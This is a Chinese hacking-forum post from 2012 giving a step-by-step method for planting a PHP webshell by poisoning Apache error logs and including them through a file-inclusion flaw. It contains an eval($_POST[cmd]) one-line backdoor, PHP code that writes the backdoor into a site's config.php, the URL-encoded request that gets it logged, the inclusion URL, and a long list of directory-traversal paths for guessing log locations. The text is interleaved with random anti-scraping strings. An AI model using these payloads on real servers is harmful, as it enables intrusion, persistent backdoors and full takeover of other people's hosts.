找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2046|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
) k) K% `. ]! G/ b( {' `
' X# A  o2 \2 C, `- s  h7 D比如还是这句一句话木马 ( {; A7 y4 G* \9 t4 J% a2 B
<?eval($_POST[cmd]);?>   3 z. G/ n. ]; C8 c5 @- `8 {5 L

; X0 H# Q3 u- W到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, $ j) v% s" w( Q6 l- l" z
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
& O( @+ w! O! K/ ]( I" x& C7 S: C: b  ~% b( L# z2 k9 E
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); . r) [) V+ B* g4 c6 r1 X6 q5 i3 C
fclose($fp);?>   //在config.php里写入一句木马语句
+ L8 S" ~8 l9 V/ G: t
- A; G( H  R1 f' [我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 + \' K' }$ b6 ^5 O$ b
转换为
. A" _# v8 @# N* h! U& h( _%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
7 B. M" h: {& _( G6 Econfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp * C- B+ m; \, c* t2 Y& ]- |* r2 j
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B + S$ a2 f$ O, [. x
fclose%28%24fp%29%3B%3F%3E
, a, Z2 n1 X/ A1 i2 t& y1 m. d我们提交 - ]* P  J- P* ~5 p3 v5 e2 ~" e
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww 7 \" y3 |# W7 K( ~% f
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
; D$ ]' [( |; o' E- D. X) H2 x%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
/ F% a% L. `  Z; Ocmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
9 p( a: _% Z$ s6 w; h
6 C4 S9 g+ E  G& u7 c. t9 L这样就错误日志里就记录下了这行写入webshell的代码。
2 Y& P3 q# P' Z/ e. j0 _3 |3 i, Z  C我们再来包含日志,提交 ' l0 m6 P  g" u* m8 h" [' i
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
4 O( z7 n  C8 ~) N$ \5 U9 J, Z0 S5 x" x9 s2 X% ]
这样webshell就写入成功了,config.php里就写入一句木马语句 1 a4 q. R9 e: T
OK. ' p) {. x7 O1 i  |( ^
http://www.xxx.com/forum/config.php这个就成了我们的webshell , M  {. \5 k# A# A: c
直接用lanker的客户端一连,主机就是你的了。 ; U& E2 v  t2 e( T( Q  M9 r$ C' C
2 z' e2 l5 q# `
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
" u! z4 I  \' k6 F0 ?# W, X4 E; W# I2 t: a* E* C2 T9 Y+ U
其他的日志路径,你可以去猜,也可以参照这里。 2 D+ |! n4 J0 Q" a8 o. y
../../../../../../../../../../var/log/httpd/access_log
+ Q& l% }0 z; d- R- V../../../../../../../../../../var/log/httpd/error_log
. Z8 E) j' p" K' @" m../apache/logs/error.log ; f# t: L- P! O3 j3 S) o. Q5 K
../apache/logs/access.log
6 ^" c* Q$ S' h' u../../apache/logs/error.log : h, {' p6 Y: S+ ?# w( Q' x- v" ^) r
../../apache/logs/access.log ) w; w  L7 e0 I) @& Q- W, P, c  _9 M
../../../apache/logs/error.log % l" b0 n2 ]; C( D) X. `
../../../apache/logs/access.log : T9 l6 [. k8 c& [% b6 @
../../../../../../../../../../etc/httpd/logs/acces_log
2 r, h% I9 Z7 h( ^# C+ g5 m8 Q../../../../../../../../../../etc/httpd/logs/acces.log 2 L8 C9 R; M' @5 H8 d
../../../../../../../../../../etc/httpd/logs/error_log
  L- o2 n6 O* o1 ~$ M9 c# w; k../../../../../../../../../../etc/httpd/logs/error.log 0 T! Q' \. l2 X& J  C
../../../../../../../../../../var/www/logs/access_log : f. R8 q2 f( E, q
../../../../../../../../../../var/www/logs/access.log
. n# t) ?5 z& z! E/ K, d: t1 e../../../../../../../../../../usr/local/apache/logs/access_log & q4 ~% Z& \. @7 D
../../../../../../../../../../usr/local/apache/logs/access.log . k: @4 j& D2 K6 Q( F8 |) u4 _
../../../../../../../../../../var/log/apache/access_log
5 x7 ^& c5 `* V9 ~# f, N2 s  s../../../../../../../../../../var/log/apache/access.log # n, {* L* B7 Y, k6 g# L
../../../../../../../../../../var/log/access_log ; b! X! Y+ x5 Q3 ?" H3 q. ?
../../../../../../../../../../var/www/logs/error_log $ n: ^; L1 o7 [& p
../../../../../../../../../../var/www/logs/error.log
5 c6 R/ [: f$ Y" `& P/ v, Z) p../../../../../../../../../../usr/local/apache/logs/error_log
" i0 p" @4 U+ _$ J../../../../../../../../../../usr/local/apache/logs/error.log
- T& ?: {& J! V! b! d7 ~5 C../../../../../../../../../../var/log/apache/error_log 4 ~) T0 {" q4 a2 |5 l; u  H3 }
../../../../../../../../../../var/log/apache/error.log 3 h' G5 T  V0 K4 \
../../../../../../../../../../var/log/access_log
0 f. M( |/ \4 J" Z9 x../../../../../../../../../../var/log/error_log ' \- q. E9 b) \1 L! _
/var/log/httpd/access_log       " Y. }8 ?+ H3 ~: q
/var/log/httpd/error_log     
7 ?: h" P% x1 ~% T% m, I../apache/logs/error.log     
0 o3 G) ]5 q0 V../apache/logs/access.log   k3 q4 K+ q0 l) y" W& s
../../apache/logs/error.log
4 |& `: J  f9 @../../apache/logs/access.log
" g( h) U8 q$ h& [( t../../../apache/logs/error.log
  I5 D8 j+ }/ b. w* n7 j../../../apache/logs/access.log 4 e3 d/ v$ d3 B" v
/etc/httpd/logs/acces_log / F: _, v) B$ h
/etc/httpd/logs/acces.log
5 o3 K6 \% w$ P6 ^  l  y/etc/httpd/logs/error_log * F( {4 n0 E- o
/etc/httpd/logs/error.log 8 Q/ O- W6 D# R, w
/var/www/logs/access_log
* U' F" u3 ^+ w; w( r- z/var/www/logs/access.log
, \( A+ C; q& L$ N5 r/usr/local/apache/logs/access_log ' M, t9 V9 M1 T- j* O6 k% L2 z
/usr/local/apache/logs/access.log + S0 H" V7 i3 n) j$ z
/var/log/apache/access_log
+ X- ^0 [" a# l2 m- V/var/log/apache/access.log 6 V: b1 C) v  N: V9 x; I
/var/log/access_log
% c7 H; y1 C+ P5 e: V/var/www/logs/error_log . D$ U0 \  o8 |6 v/ ~
/var/www/logs/error.log
& E9 M% n# H7 k( J0 B/usr/local/apache/logs/error_log
1 {: M: E7 j) @& x4 w/usr/local/apache/logs/error.log 2 V8 V# _! L# `8 m/ Z# g
/var/log/apache/error_log
  @4 R, X# \; Q$ O7 Z" F/var/log/apache/error.log
6 V! Q6 c3 p9 p0 j+ K/var/log/access_log 5 J5 w7 {; h# a% A' R% F
/var/log/error_log
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表